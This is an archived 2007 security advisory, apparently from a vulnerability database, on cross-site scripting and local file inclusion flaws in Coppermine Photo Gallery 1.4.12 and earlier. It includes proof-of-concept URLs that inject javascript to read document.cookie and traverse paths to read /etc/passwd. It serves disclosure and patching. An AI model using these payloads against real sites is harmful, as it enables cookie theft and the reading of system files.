Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18017
HistorySep 19, 2007 - 12:00 a.m.

Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion

2007-09-1900:00:00
vulners.com
37
JSON

============================================================
Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion

Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting/Local File Inclusion
Status: patch available

Affected software description:

Application: Coppermine Photo Gallery
Version: <= 1.4.12
Vendor: http://coppermine-gallery.net

Description:
Coppermine is a multi-purpose fully-featured and integrated
web picture gallery script written in PHP using GD or ImageMagick
as image library with a MySQL backend.

Vulnerabilities:

The script mode.php does not properly sanitize the "referer" parameter.

The script viewlog.php does not properly sanitize the "log" parameter.

Poc/Exploit:

http://localhost/cpg/mode.php?admin_mode=1&amp;referer=javascript:alert&#40;document.cookie&#41;

http://localhost/cpg/viewlog.php?log=../../../../../../../../../etc/passwd&#37;00
(should need admin privileges)

Solution:

update to 1.4.13 or above

Timeline:

03.09.2007 - vendor informed
14.09.2007 - patch released by vendor
17.09.2007 - public disclosure

JSON